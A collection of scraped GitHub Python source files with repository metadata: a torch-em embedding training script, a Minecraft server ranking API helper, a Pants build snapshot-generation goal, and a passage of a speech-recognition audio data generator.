patch_shape = [24, 192, 192]
train_sets = [f'{ds}_train' for ds in datasets]
val_sets = [f'{ds}_val' for ds in datasets]
if args.train_on_val:
train_sets += val_sets
train_loader = get_loader(
datasets=train_sets,
patch_shape=patch_shape,
n_samples=1000
)
val_loader = get_loader(
datasets=val_sets,
patch_shape=patch_shape,
n_samples=100
)
loss = torch_em.loss.ContrastiveLoss(
delta_var=.75,
delta_dist=2.,
impl='scatter'
)
tag = 'large' if large_model else 'default'
if args.train_on_val:
tag += '_train_on_val'
name = f"embedding_model_{tag}_{'_'.join(datasets)}"
trainer = torch_em.default_segmentation_trainer(
name=name,
model=model,
train_loader=train_loader,
val_loader=val_loader,
loss=loss,
metric=loss,
learning_rate=5e-5,
mixed_precision=True,
log_image_interval=50
)
if args.from_checkpoint:
trainer.fit(args.iterations, 'latest')
else:
trainer.fit(args.iterations)
def check(datasets, train=True, val=True, n_images=5):
from torch_em.util.debug import check_loader
patch_shape = [32, 256, 256]
if train:
print("Check train loader")
dsets = [f'{ds}_train' for ds in datasets]
loader = get_loader(dsets, patch_shape)
check_loader(loader, n_images)
if val:
print("Check val loader")
dsets = [f'{ds}_val' for ds in datasets]
loader = get_loader(dsets, patch_shape)
check_loader(loader, n_images)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--datasets', '-d', type=str, nargs='+', default=['human', 'rat'])
parser.add_argument('--check', '-c', type=int, default=0)
parser.add_argument('--iterations', '-i', type=int, default=int(1e5))
parser.add_argument('--large_model', '-l', type=int, default=0)
parser.add_argument('--from_checkpoint', type=int, default=0)
parser.add_argument('--train_on_val', type=int, default=0)
dataset_names = ['human', 'rat']
args = parser.parse_args()
datasets = args.datasets
datasets.sort()
assert all(ds in dataset_names for ds in datasets)
if args.check:
check(datasets, train=True, val=True)
else:
train_embeddings(args, datasets)
|
constantinpape/torch-em
|
experiments/unet-segmentation/mitochondria-segmentation/mito-em/challenge/embeddings/train_embeddings.py
|
train_embeddings.py
|
py
| 4,556 |
python
|
en
|
code
| 42 |
github-code
|
6
|
11499299532
|
import requests,json
def ranking(duration="daily",ranking_type="break",offset=0,lim=20,unit=False):
try:
resp = requests.get(f'https://w4.minecraftserver.jp/api/ranking?type={ranking_type}k&offset={offset}&lim={lim}&duration={duration}')
data_json = json.loads(resp.text)
rank_list = list(data_json["ranks"])
rank = 1
for mcid_data in rank_list:
get_mcid = mcid_data["player"]
get_data = mcid_data["data"]
seichi_ryo = get_data["raw_data"]
name = get_mcid["name"]
if unit == True:
if len(str(seichi_ryo)) > 8:
seichi_ryo_kugiri0 = str(seichi_ryo)[-4:]
seichi_ryo_kugiri1 = str(seichi_ryo)[-8:-4]
seichi_ryo_kugiri2 = str(seichi_ryo)[:-8]
seichi_ryo = f"{seichi_ryo_kugiri2}億{seichi_ryo_kugiri1}万{seichi_ryo_kugiri0}"
elif len(str(seichi_ryo)) > 4:
seichi_ryo_kugiri0 = str(seichi_ryo)[-4:]
seichi_ryo_kugiri1 = str(seichi_ryo)[:-4]
seichi_ryo = seichi_ryo_kugiri1 + "万" + seichi_ryo_kugiri0
msg += f"{rank}位 {name} 整地量:{seichi_ryo}\n"
rank += 1
return msg
except:
text = "引数が無効または整地鯖APIが死んでます"
return text
def get_data(mcid=None,uuid=None,data_type="break",type_data_type="data"):
try:
if mcid != None:
resp = requests.get(f'https://api.mojang.com/users/profiles/minecraft/{mcid}')
data_json = json.loads(resp.text)
uuid_before = data_json["id"]
uuid = uuid_before[0:8]
uuid += "-"
uuid += uuid_before[8:12]
uuid += "-"
uuid += uuid_before[12:16]
uuid += "-"
uuid += uuid_before[16:20]
uuid += "-"
uuid += uuid_before[20:32]
print(uuid)
print(f'https://w4.minecraftserver.jp/api/ranking/player/{uuid}?types={data_type}')
resp = requests.get(f'https://w4.minecraftserver.jp/api/ranking/player/{uuid}?types={data_type}')
data_json = json.loads(resp.text)
if type_data_type == "data":
data = data_json[0]["data"]["raw_data"]
return data
if type_data_type == "lastquit":
return data_json[0]["lastquit"]
elif uuid != None:
resp = requests.get(f'https://w4.minecraftserver.jp/api/ranking/player/{uuid}?types={data_type}')
data_json = json.loads(resp.text)
if type_data_type == "data":
return data_json[0]["data"]["raw_data"]
if type_data_type == "lastquit":
return data_json[0]["lastquit"]
except:
text = "引数が無効または整地鯖APIが死んでます"
return text
#必須ライブラリ
#json
#reqests
#インストールコマンド
#py -m pip install json
#py -m pip install reqests
#私のdiscord鯖
#https://discord.gg/Gs7VXE
#私のdiscord垢
#neruhito#6113
#672910471279673358
|
nekorobi-0/seichi_ranking
|
seichi_ranking.py
|
seichi_ranking.py
|
py
| 3,146 |
python
|
en
|
code
| 2 |
github-code
|
6
|
26042467106
|
from __future__ import annotations
import logging
from abc import ABCMeta
from dataclasses import dataclass
from pants.core.util_rules.environments import EnvironmentNameRequest
from pants.engine.environment import EnvironmentName
from pants.engine.fs import MergeDigests, Snapshot, Workspace
from pants.engine.goal import Goal, GoalSubsystem
from pants.engine.rules import Get, MultiGet, collect_rules, goal_rule, rule
from pants.engine.target import (
FieldSet,
NoApplicableTargetsBehavior,
TargetRootsToFieldSets,
TargetRootsToFieldSetsRequest,
)
from pants.engine.unions import UnionMembership, union
logger = logging.getLogger(__name__)
@union
class GenerateSnapshotsFieldSet(FieldSet, metaclass=ABCMeta):
"""The fields necessary to generate snapshots from a target."""
@dataclass(frozen=True)
class GenerateSnapshotsResult:
snapshot: Snapshot
@dataclass(frozen=True)
class EnvironmentAwareGenerateSnapshotsRequest:
"""Request class to request a `GenerateSnapshotsResult` in an environment-aware fashion."""
field_set: GenerateSnapshotsFieldSet
@rule
async def environment_await_generate_snapshots(
request: EnvironmentAwareGenerateSnapshotsRequest,
) -> GenerateSnapshotsResult:
environment_name = await Get(
EnvironmentName,
EnvironmentNameRequest,
EnvironmentNameRequest.from_field_set(request.field_set),
)
result = await Get(
GenerateSnapshotsResult,
{request.field_set: GenerateSnapshotsFieldSet, environment_name: EnvironmentName},
)
return result
class GenerateSnapshotsSubsystem(GoalSubsystem):
name = "generate-snapshots"
help = "Generate test snapshots."
@classmethod
def activated(cls, union_membership: UnionMembership) -> bool:
return GenerateSnapshotsFieldSet in union_membership
class GenerateSnapshots(Goal):
subsystem_cls = GenerateSnapshotsSubsystem
environment_behavior = Goal.EnvironmentBehavior.USES_ENVIRONMENTS
@goal_rule
async def generate_snapshots(workspace: Workspace) -> GenerateSnapshots:
target_roots_to_field_sets = await Get(
TargetRootsToFieldSets,
TargetRootsToFieldSetsRequest(
GenerateSnapshotsFieldSet,
goal_description=f"the `{GenerateSnapshotsSubsystem.name}` goal",
no_applicable_targets_behavior=NoApplicableTargetsBehavior.error,
),
)
if not target_roots_to_field_sets.field_sets:
return GenerateSnapshots(exit_code=0)
snapshot_results = await MultiGet(
Get(GenerateSnapshotsResult, EnvironmentAwareGenerateSnapshotsRequest(field_set))
for field_set in target_roots_to_field_sets.field_sets
)
all_snapshots = await Get(
Snapshot, MergeDigests([result.snapshot.digest for result in snapshot_results])
)
workspace.write_digest(all_snapshots.digest)
for file in all_snapshots.files:
logger.info(f"Generated {file}")
return GenerateSnapshots(exit_code=0)
def rules():
return collect_rules()
|
pantsbuild/pants
|
src/python/pants/core/goals/generate_snapshots.py
|
generate_snapshots.py
|
py
| 3,031 |
python
|
en
|
code
| 2,896 |
github-code
|
6
|
30827334271
|
import json
import os
class FileUtils:
@staticmethod
def readJsonFile(filePath):
with open(filePath, 'r', encoding='utf-8') as file:
jsonData = json.load(file)
return jsonData
@staticmethod
def writeJsonFile(filePath, jsonData):
with open(filePath, 'w', encoding='utf-8') as file:
file.write(json.dumps(jsonData, sort_keys=False, indent=4, separators=(',', ': ')))
@staticmethod
def readLinesFromFile(filePath) -> list:
with open(filePath, 'r', encoding='utf-8') as f:
return [line.replace('\n', '') for line in f.readlines()]
|
Danny0515/Portfolio-crawler
|
src/main/utils/FileUtils.py
|
FileUtils.py
|
py
| 622 |
python
|
en
|
code
| 0 |
github-code
|
6
|
29852066628
|
__author__ = "Rohit N Dubey"
from django.conf.urls import patterns, include, url
from django.contrib import admin
from views import Ignite
from . import prod
urlpatterns = patterns('',
url(r'^ui/(?P<path>.*)$', 'django.views.static.serve', { 'document_root': prod.UI_ROOT, }),
url(r'^api/pool/', include('pool.urls')),
url(r'^api/discoveryrule/', include('discoveryrule.urls')),
url(r'^api/configuration/', include('configuration.urls')),
# url(r'^api/usermanagement/', include('usermanagement.urls')),
url(r'^api/fabric/', include('fabric.urls')),
url(r'^api/resource/', include('resource.urls')),
url(r'^admin/', include(admin.site.urls)),
url(r'^auth/', include('djoser.urls')),
url(r'^api/ignite', Ignite.as_view(), name='home'),
)
|
salran40/POAP
|
ignite/urls.py
|
urls.py
|
py
| 805 |
python
|
en
|
code
| 0 |
github-code
|
6
|
9777903968
|
import math
from django.db import models
from django.db.models.signals import pre_save, post_save
from apps.addresses.models import Address
from apps.carts.models import Cart
from apps.billing.models import BillingProfile
from main.utils import unique_order_id_generator
# ORDER STATUS OPTIONS
ORDER_STATUS_CHOICES = (
# (stored value, Displayed value) #
('created', 'Created'),
('paid', 'Paid'),
('shipped', 'Shipped'),
('delivered', 'Delivered'),
('refunded', 'Refunded'),
)
class OrderManager(models.Manager):
def new_or_get(self, billing_profile, cart_obj):
created = False
# QUERY for existing order
qs = self.get_queryset().filter(billing_profile=billing_profile, cart=cart_obj, active=True, status='created')
print("QS -> ", qs)
# Found Order
if qs.count() == 1:
# created = False
# variable OBJECT to assign queryset
obj = qs.first()
print("FOUND -> Obj -> ", obj)
else:
# Create object instance
obj = self.model.objects.create(billing_profile=billing_profile, cart=cart_obj)
created = True
print("CREATED -> Obj -> ", obj)
return obj, created
class Order(models.Model):
billing_profile = models.ForeignKey(BillingProfile, null=True, blank=True)
shipping_address = models.ForeignKey(Address, related_name="shipping_address", null=True, blank=True)
billing_address = models.ForeignKey(Address, related_name="billing_address", null=True, blank=True)
cart = models.ForeignKey(Cart)
# pk / id -> unique, random
order_id = models.CharField(max_length=120, blank=True)
status = models.CharField(max_length=120, default='created', choices=ORDER_STATUS_CHOICES)
shipping_total = models.DecimalField(default=5.99, max_digits=7, decimal_places=2)
total = models.DecimalField(default=0.00, max_digits=7, decimal_places=2)
active = models.BooleanField(default=True)
def __str__(self):
return self.order_id
# attach Manager to Order
objects = OrderManager()
# update total instance method
def update_total(self):
# object variables
cart_total = self.cart.total
shipping_total = self.shipping_total
# Fixing data types -> (decimal, float)
new_total = math.fsum([cart_total, shipping_total])
# Format output
formatted_total = format(new_total, '.2f')
# Assign instance
self.total = formatted_total
# Save instance
self.save()
return new_total
# Method to check if the ORDER is complete
def check_done(self):
billing_profile = self.billing_profile
billing_address = self.billing_address
shipping_address = self.shipping_address
total = self.total
if billing_profile and billing_address and shipping_address and total > 0:
return True
return False
def mark_paid(self):
if self.check_done():
# Update ORDER status
self.status = "paid"
self.save()
return self.status
# GENERATE THE ORDER ID
def pre_save_create_order_id(sender, instance, *args, **kwargs):
if not instance.order_id:
instance.order_id = unique_order_id_generator(instance)
# Define Queryset --> Find any existing carts
qs = Order.objects.filter(cart=instance.cart).exclude(billing_profile=instance.billing_profile)
if qs.exists():
print("Found previous cart ... ")
# update previous carts to be in-active
qs.update(active=False)
# Connect Signal
pre_save.connect(pre_save_create_order_id, sender=Order)
# GENERATE THE ORDER TOTAL
def post_save_cart_total(sender, instance, created, *args, **kwargs):
if not created:
cart_obj = instance
cart_total = cart_obj.total
cart_id = cart_obj.id
qs = Order.objects.filter(cart__id=cart_id)
if qs.count() == 1:
order_obj = qs.first()
order_obj.update_total()
# Connect Signal
post_save.connect(post_save_cart_total, sender=Cart)
def post_save_order(sender, instance, created, *args, **kwargs):
print("Saving Order ...")
if created:
print("Updating ... Order Updated")
instance.update_total()
# Connect Signal
post_save.connect(post_save_order, sender=Order)
|
ehoversten/Ecommerce_Django
|
main/apps/orders/models.py
|
models.py
|
py
| 4,469 |
python
|
en
|
code
| 2 |
github-code
|
6
|
73100458107
|
# Network Traffic Analyzer:
# Analyze network packet captures for anomalies and threats.
# pip install pyshark
'''
Python script that reads a Wireshark PCAP file and performs basic security analysis,
such as identifying suspicious traffic, detecting port scans, and checking for potential security threats.
The script uses the pyshark library to parse the PCAP file.
'''
import pyshark
def analyze_pcap(pcap_file):
# Create a PyShark capture object
capture = pyshark.FileCapture(pcap_file)
# Initialize variables for analysis
suspicious_traffic = 0
port_scan_detected = False
# Loop through each packet in the capture file
for packet in capture:
# Check for potential port scanning
if "TCP" in packet and int(packet["TCP"].dstport) < 1024:
port_scan_detected = True
# Add more checks for specific threats or anomalies as needed
# Analyze the results
if port_scan_detected:
print("Port scan detected in the network traffic.")
else:
print("No port scan detected.")
if suspicious_traffic > 0:
print(f"Detected {suspicious_traffic} suspicious packets in the network traffic.")
else:
print("No suspicious traffic detected.")
if __name__ == "__main__":
# Replace 'your_capture.pcap' with the path to your PCAP file
pcap_file_path = 'your_capture.pcap'
analyze_pcap(pcap_file_path)
|
Cnawel/greyhat-python
|
wireshark/traffice_analyzer.py
|
traffice_analyzer.py
|
py
| 1,415 |
python
|
en
|
code
| 0 |
github-code
|
6
|
41858795618
|
#############################################################################################
# Foi feita uma estatística em cinco cidades brasileiras para coletar dados sobre acidentes #
# de trânsito. Foram obtidos os seguintes dados: #
# a) Código da cidade; #
# b) Número de veículos de passeio (em 1999); #
# c) Número de acidentes de trânsito com vítimas (em 1999). #
# Deseja-se saber: #
# d) Qual o maior e menor índice de acidentes de transito e a que cidade pertence; #
# e) Qual a média de veículos nas cinco cidades juntas; #
#############################################################################################
from datetime import date
maior = código_maior = menor = código_menor = carros = acidentes_2000 = média_acidentes = 0
nc_2000 = 1
for c in range(1, 6):
print('-' * 60)
# Solicita Código da cidade
código = int(input(f'Código da {c}ª cidade: '))
# Solicita Número de veículos de passeio
veículos = int(input(f'Número de veículos de passeio (em {date.today().year - 1}): '))
# Solicita úmero de acidentes de trânsito com vítimas
acidentes = int(input(f'Número de acidentes de trânsito com vítimas (em {date.today().year - 1}): '))
# Mostra o maior e menor índice de acidentes de transito e a que cidade pertence
if acidentes > maior:
maior = acidentes
código_maior = código
if código_menor == 0:
menor = acidentes
código_menor = código
if acidentes < menor:
menor = acidentes
código_menor = código
# Mostra a média de veículos nas cinco cidades juntas
carros += veículos
média_veículos = carros / c
print('-' * 60)
print(f"""O maior indíce de acidentes foi {maior} na cidade de código {código_maior}
O menor indíce de acidentes foi {menor} na cidade de código {código_menor}
A média de veículos nas {c} cidades foi {média_veículos}""")
|
nralex/Python
|
3-EstruturaDeRepeticao/exercício40.py
|
exercício40.py
|
py
| 2,234 |
python
|
pt
|
code
| 0 |
github-code
|
6
|
15363352723
|
# ABC095 - C
a,b,c,x,y = [int(x) for x in input().split()]
ans = 0
ans += min((a+b)*min(x,y),c*2*min(x,y))
# 先ずmin(x,y)個まで買うときのパターンを考える
if x == y:
print(ans)
exit()
if x > y: # 足りないピザの情報を記録
rest = ["x",max(x,y)-min(x,y)]
else:
rest = ["y",max(x,y)-min(x,y)]
if rest[0] == "x":
ans += min(a*rest[1],c*2*rest[1])
else:
ans += min(b*rest[1],c*2*rest[1])
print(ans)
|
idylle-cynique/atcoder_problems
|
AtCoder Beginners Contest/ABC095-C.py
|
ABC095-C.py
|
py
| 513 |
python
|
en
|
code
| 0 |
github-code
|
6
|
12959904969
|
from .declarative import (
declarative,
get_declared,
get_members,
)
from .dispatch import dispatch
from .evaluate import (
evaluate,
evaluate_recursive,
evaluate_recursive_strict,
evaluate_strict,
get_callable_description,
matches,
)
from .namespace import (
EMPTY,
flatten,
flatten_items,
getattr_path,
Namespace,
setattr_path,
setdefaults_path,
)
from .refinable import (
refinable,
Refinable,
RefinableObject,
)
from .shortcut import (
class_shortcut,
get_shortcuts_by_name,
is_shortcut,
shortcut,
Shortcut,
)
from .sort_after import (
LAST,
sort_after,
)
from .with_meta import with_meta
__version__ = '5.7.0'
__all__ = [
'assert_kwargs_empty',
'class_shortcut',
'declarative',
'dispatch',
'EMPTY',
'evaluate',
'evaluate_strict',
'evaluate_recursive',
'evaluate_recursive_strict',
'filter_show_recursive',
'flatten',
'flatten_items',
'full_function_name',
'get_shortcuts_by_name',
'getattr_path',
'get_members',
'is_shortcut',
'LAST',
'matches',
'Namespace',
'remove_show_recursive',
'refinable',
'Refinable',
'RefinableObject',
'setattr_path',
'setdefaults_path',
'shortcut',
'Shortcut',
'should_show',
'sort_after',
'with_meta',
]
def should_show(item):
try:
r = item.show
except AttributeError:
try:
r = item['show']
except (TypeError, KeyError):
return True
if callable(r):
assert False, "`show` was a callable. You probably forgot to evaluate it. The callable was: {}".format(get_callable_description(r))
return r
def filter_show_recursive(item):
if isinstance(item, list):
return [filter_show_recursive(v) for v in item if should_show(v)]
if isinstance(item, dict):
# The type(item)(** stuff is to preserve the original type
return type(item)(**{k: filter_show_recursive(v) for k, v in dict.items(item) if should_show(v)})
if isinstance(item, set):
return {filter_show_recursive(v) for v in item if should_show(v)}
return item
def remove_keys_recursive(item, keys_to_remove):
if isinstance(item, list):
return [remove_keys_recursive(v, keys_to_remove) for v in item]
if isinstance(item, set):
return {remove_keys_recursive(v, keys_to_remove) for v in item}
if isinstance(item, dict):
return {k: remove_keys_recursive(v, keys_to_remove) for k, v in dict.items(item) if k not in keys_to_remove}
return item
def remove_show_recursive(item):
return remove_keys_recursive(item, {'show'})
def assert_kwargs_empty(kwargs):
if kwargs:
import traceback
function_name = traceback.extract_stack()[-2][2]
raise TypeError('%s() got unexpected keyword arguments %s' % (function_name, ', '.join(["'%s'" % x for x in sorted(kwargs.keys())])))
def full_function_name(f):
return '%s.%s' % (f.__module__, f.__name__)
def generate_rst_docs(directory, classes, missing_objects=None): # pragma: no coverage
"""
Generate documentation for tri.declarative APIs
:param directory: directory to write the .rst files into
:param classes: list of classes to generate documentation for
:param missing_objects: tuple of objects to count as missing markers, if applicable
"""
doc_by_filename = _generate_rst_docs(classes=classes, missing_objects=missing_objects) # pragma: no mutate
for filename, doc in doc_by_filename: # pragma: no mutate
with open(directory + filename, 'w') as f2: # pragma: no mutate
f2.write(doc) # pragma: no mutate
# noinspection PyShadowingNames
def _generate_rst_docs(classes, missing_objects=None):
if missing_objects is None:
missing_objects = tuple()
import re
def docstring_param_dict(obj):
# noinspection PyShadowingNames
doc = obj.__doc__
if doc is None:
return dict(text=None, params={})
return dict(
text=doc[:doc.find(':param')].strip() if ':param' in doc else doc.strip(),
params=dict(re.findall(r":param (?P<name>\w+): (?P<text>.*)", doc))
)
def indent(levels, s):
return (' ' * levels * 4) + s.strip()
# noinspection PyShadowingNames
def get_namespace(c):
return Namespace(
{k: c.__init__.dispatch.get(k) for k, v in get_declared(c, 'refinable_members').items()})
for c in classes:
from io import StringIO
f = StringIO()
def w(levels, s):
f.write(indent(levels, s))
f.write('\n')
def section(level, title):
underline = {
0: '=',
1: '-',
2: '^',
}[level] * len(title)
w(0, title)
w(0, underline)
w(0, '')
section(0, c.__name__)
class_doc = docstring_param_dict(c)
constructor_doc = docstring_param_dict(c.__init__)
if class_doc['text']:
f.write(class_doc['text'])
w(0, '')
if constructor_doc['text']:
if class_doc['text']:
w(0, '')
f.write(constructor_doc['text'])
w(0, '')
w(0, '')
section(1, 'Refinable members')
# noinspection PyCallByClass
for refinable_, value in sorted(dict.items(get_namespace(c))):
w(0, '* `' + refinable_ + '`')
if constructor_doc['params'].get(refinable_):
w(1, constructor_doc['params'][refinable_])
w(0, '')
w(0, '')
defaults = Namespace()
for refinable_, value in sorted(get_namespace(c).items()):
if value not in (None,) + missing_objects:
defaults[refinable_] = value
if defaults:
section(2, 'Defaults')
for k, v in sorted(flatten_items(defaults)):
if v != {}:
if '<lambda>' in repr(v):
import inspect
v = inspect.getsource(v)
v = v[v.find('lambda'):]
v = v.strip().strip(',')
elif callable(v):
v = v.__module__ + '.' + v.__name__
if v == '':
v = '""'
w(0, '* `%s`' % k)
w(1, '* `%s`' % v)
w(0, '')
shortcuts = get_shortcuts_by_name(c)
if shortcuts:
section(1, 'Shortcuts')
for name, shortcut_ in sorted(shortcuts.items()):
section(2, f'`{name}`')
if shortcut_.__doc__:
doc = shortcut_.__doc__
f.write(doc.strip())
w(0, '')
w(0, '')
yield '/%s.rst' % c.__name__, f.getvalue()
|
jlubcke/tri.declarative
|
lib/tri_declarative/__init__.py
|
__init__.py
|
py
| 6,981 |
python
|
en
|
code
| 17 |
github-code
|
6
|
30886261452
|
######### import statements for sample_models.py ###########
from keras import backend as K
from keras.models import Model
from keras.layers import (BatchNormalization, Conv1D, Dense, Input,
TimeDistributed, Activation, Bidirectional, SimpleRNN, GRU, LSTM)
################################
########### import statements for train_utils.py #############
# from data_generator import AudioGenerator ## Now codes of data_generator.py are pasted here. So I think that this import is useless
import _pickle as pickle
from keras import backend as K
from keras.models import Model
from keras.layers import (Input, Lambda, BatchNormalization)
from keras.optimizers import SGD, RMSprop
from keras.callbacks import ModelCheckpoint
import os
#####################################################
############ import and variable definitions for data_generator.py #############
import json
import numpy as np
import random
from python_speech_features import mfcc
import librosa
import scipy.io.wavfile as wav
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1 import make_axes_locatable
from utils import calc_feat_dim, spectrogram_from_file, text_to_int_sequence
from utils import conv_output_length
RNG_SEED = 123
######################################################################
##################### all codes of data_generator.py starts here ############################3
class AudioGenerator():
def __init__(self, step=10, window=20, max_freq=8000, mfcc_dim=13,
minibatch_size=20, desc_file=None, spectrogram=True, max_duration=10.0,
sort_by_duration=False):
"""
Params:
step (int): Step size in milliseconds between windows (for spectrogram ONLY)
window (int): FFT window size in milliseconds (for spectrogram ONLY)
max_freq (int): Only FFT bins corresponding to frequencies between
[0, max_freq] are returned (for spectrogram ONLY)
desc_file (str, optional): Path to a JSON-line file that contains
labels and paths to the audio files. If this is None, then
load metadata right away
"""
self.feat_dim = calc_feat_dim(window, max_freq) # spectogram
self.mfcc_dim = mfcc_dim
self.feats_mean = np.zeros((self.feat_dim,))
self.feats_std = np.ones((self.feat_dim,))
self.rng = random.Random(RNG_SEED)
if desc_file is not None:
self.load_metadata_from_desc_file(desc_file)
self.step = step
self.window = window
self.max_freq = max_freq
self.cur_train_index = 0
self.cur_valid_index = 0
self.cur_test_index = 0
self.max_duration=max_duration
self.minibatch_size = minibatch_size
self.spectrogram = spectrogram
self.sort_by_duration = sort_by_duration
def get_batch(self, partition):
""" Obtain a batch of train, validation, or test data
"""
if partition == 'train':
audio_paths = self.train_audio_paths
cur_index = self.cur_train_index
texts = self.train_texts
elif partition == 'valid':
audio_paths = self.valid_audio_paths
cur_index = self.cur_valid_index
texts = self.valid_texts
elif partition == 'test':
audio_paths = self.test_audio_paths
cur_index = self.test_valid_index
texts = self.test_texts
else:
raise Exception("Invalid partition. "
"Must be train/validation")
features = [self.normalize(self.featurize(a)) for a in
audio_paths[cur_index:cur_index+self.minibatch_size]]
# calculate necessary sizes
max_length = max([features[i].shape[0]
for i in range(0, self.minibatch_size)])
max_string_length = max([len(texts[cur_index+i])
for i in range(0, self.minibatch_size)])
# initialize the arrays
X_data = np.zeros([self.minibatch_size, max_length,
self.feat_dim*self.spectrogram + self.mfcc_dim*(not self.spectrogram)])
labels = np.ones([self.minibatch_size, max_string_length]) * 28 # blanks
input_length = np.zeros([self.minibatch_size, 1])
label_length = np.zeros([self.minibatch_size, 1])
for i in range(0, self.minibatch_size):
# calculate X_data & input_length
feat = features[i]
input_length[i] = feat.shape[0]
X_data[i, :feat.shape[0], :] = feat
# calculate labels & label_length
label = np.array(text_to_int_sequence(texts[cur_index+i]))
labels[i, :len(label)] = label
label_length[i] = len(label)
# return the arrays
outputs = {'ctc': np.zeros([self.minibatch_size])}
inputs = {'the_input': X_data,
'the_labels': labels,
'input_length': input_length,
'label_length': label_length
}
return (inputs, outputs)
def shuffle_data_by_partition(self, partition):
""" Shuffle the training or validation data
"""
if partition == 'train':
self.train_audio_paths, self.train_durations, self.train_texts = shuffle_data(
self.train_audio_paths, self.train_durations, self.train_texts)
elif partition == 'valid':
self.valid_audio_paths, self.valid_durations, self.valid_texts = shuffle_data(
self.valid_audio_paths, self.valid_durations, self.valid_texts)
else:
raise Exception("Invalid partition. "
"Must be train/validation")
def sort_data_by_duration(self, partition):
""" Sort the training or validation sets by (increasing) duration
"""
if partition == 'train':
self.train_audio_paths, self.train_durations, self.train_texts = sort_data(
self.train_audio_paths, self.train_durations, self.train_texts)
elif partition == 'valid':
self.valid_audio_paths, self.valid_durations, self.valid_texts = sort_data(
self.valid_audio_paths, self.valid_durations, self.valid_texts)
else:
raise Exception("Invalid partition. "
"Must be train/validation")
def next_train(self):
""" Obtain a batch of training data
"""
while True:
ret = self.get_batch('train')
self.cur_train_index += self.minibatch_size
if self.cur_train_index >= len(self.train_texts) - self.minibatch_size:
self.cur_train_index = 0
self.shuffle_data_by_partition('train')
yield ret
def next_valid(self):
""" Obtain a batch of validation data
"""
while True:
ret = self.get_batch('valid')
self.cur_valid_index += self.minibatch_size
if self.cur_valid_index >= len(self.valid_texts) - self.minibatch_size:
self.cur_valid_index = 0
self.shuffle_data_by_partition('valid')
yield ret
def next_test(self):
""" Obtain a batch of test data
"""
while True:
ret = self.get_batch('test')
self.cur_test_index += self.minibatch_size
if self.cur_test_index >= len(self.test_texts) - self.minibatch_size:
self.cur_test_index = 0
yield ret
def load_train_data(self, desc_file='train_corpus.json'):
self.load_metadata_from_desc_file(desc_file, 'train')
self.fit_train()
if self.sort_by_duration:
self.sort_data_by_duration('train')
def load_validation_data(self, desc_file='valid_corpus.json'):
self.load_metadata_from_desc_file(desc_file, 'validation')
if self.sort_by_duration:
self.sort_data_by_duration('valid')
def load_test_data(self, desc_file='test_corpus.json'):
self.load_metadata_from_desc_file(desc_file, 'test')
def load_metadata_from_desc_file(self, desc_file, partition):
""" Read metadata from a JSON-line file
(possibly takes long, depending on the filesize)
Params:
desc_file (str): Path to a JSON-line file that contains labels and
paths to the audio files
partition (str): One of 'train', 'validation' or 'test'
"""
audio_paths, durations, texts = [], [], []
with open(desc_file) as json_line_file:
for line_num, json_line in enumerate(json_line_file):
try:
spec = json.loads(json_line)
if float(spec['duration']) > self.max_duration:
continue
audio_paths.append(spec['key'])
durations.append(float(spec['duration']))
texts.append(spec['text'])
except Exception as e:
# Change to (KeyError, ValueError) or
# (KeyError,json.decoder.JSONDecodeError), depending on
# json module version
print('Error reading line #{}: {}'
.format(line_num, json_line))
if partition == 'train':
self.train_audio_paths = audio_paths
self.train_audio_paths = self.train_audio_paths[:500] # changed
self.train_durations = durations
self.train_durations = self.train_durations[:500] # changed
self.train_texts = texts
self.train_texts = self.train_texts[:500] # changed
elif partition == 'validation':
self.valid_audio_paths = audio_paths
self.valid_audio_paths = self.valid_audio_paths[:50] # changed
self.valid_durations = durations
self.valid_durations = self.valid_durations[:50] # changed
self.valid_texts = texts
self.valid_texts = self.valid_texts[:50] # changed
elif partition == 'test':
self.test_audio_paths = audio_paths
self.test_durations = durations
self.test_texts = texts
else:
raise Exception("Invalid partition to load metadata. "
"Must be train/validation/test")
def fit_train(self, k_samples=100):
""" Estimate the mean and std of the features from the training set
Params:
k_samples (int): Use this number of samples for estimation
"""
k_samples = min(k_samples, len(self.train_audio_paths))
samples = self.rng.sample(self.train_audio_paths, k_samples)
feats = [self.featurize(s) for s in samples]
feats = np.vstack(feats)
self.feats_mean = np.mean(feats, axis=0)
self.feats_std = np.std(feats, axis=0)
def featurize(self, audio_clip):
""" For a given audio clip, calculate the corresponding feature
Params:
audio_clip (str): Path to the audio clip
"""
if self.spectrogram:
return spectrogram_from_file(
audio_clip, step=self.step, window=self.window,
max_freq=self.max_freq)
else:
(rate, sig) = wav.read(audio_clip)
return mfcc(sig, rate, numcep=self.mfcc_dim)
def normalize(self, feature, eps=1e-14):
""" Center a feature using the mean and std
Params:
feature (numpy.ndarray): Feature to normalize
"""
return (feature - self.feats_mean) / (self.feats_std + eps)
def shuffle_data(audio_paths, durations, texts):
""" Shuffle the data (called after making a complete pass through
training or validation data during the training process)
Params:
audio_paths (list): Paths to audio clips
durations (list): Durations of utterances for each audio clip
texts (list): Sentences uttered in each audio clip
"""
p = np.random.permutation(len(audio_paths))
audio_paths = [audio_paths[i] for i in p]
durations = [durations[i] for i in p]
texts = [texts[i] for i in p]
return audio_paths, durations, texts
def sort_data(audio_paths, durations, texts):
""" Sort the data by duration
Params:
audio_paths (list): Paths to audio clips
durations (list): Durations of utterances for each audio clip
texts (list): Sentences uttered in each audio clip
"""
p = np.argsort(durations).tolist()
audio_paths = [audio_paths[i] for i in p]
durations = [durations[i] for i in p]
texts = [texts[i] for i in p]
return audio_paths, durations, texts
def vis_train_features(index=0):
""" Visualizing the data point in the training set at the supplied index
"""
# obtain spectrogram
audio_gen = AudioGenerator(spectrogram=True)
audio_gen.load_train_data()
vis_audio_path = audio_gen.train_audio_paths[index]
vis_spectrogram_feature = audio_gen.normalize(audio_gen.featurize(vis_audio_path))
# obtain mfcc
audio_gen = AudioGenerator(spectrogram=False)
audio_gen.load_train_data()
vis_mfcc_feature = audio_gen.normalize(audio_gen.featurize(vis_audio_path))
# obtain text label
vis_text = audio_gen.train_texts[index]
# obtain raw audio
vis_raw_audio, _ = librosa.load(vis_audio_path)
# print total number of training examples
print('There are %d total training examples.' % len(audio_gen.train_audio_paths))
# return labels for plotting
return vis_text, vis_raw_audio, vis_mfcc_feature, vis_spectrogram_feature, vis_audio_path
def plot_raw_audio(vis_raw_audio):
# plot the raw audio signal
fig = plt.figure(figsize=(12,3))
ax = fig.add_subplot(111)
steps = len(vis_raw_audio)
ax.plot(np.linspace(1, steps, steps), vis_raw_audio)
plt.title('Audio Signal')
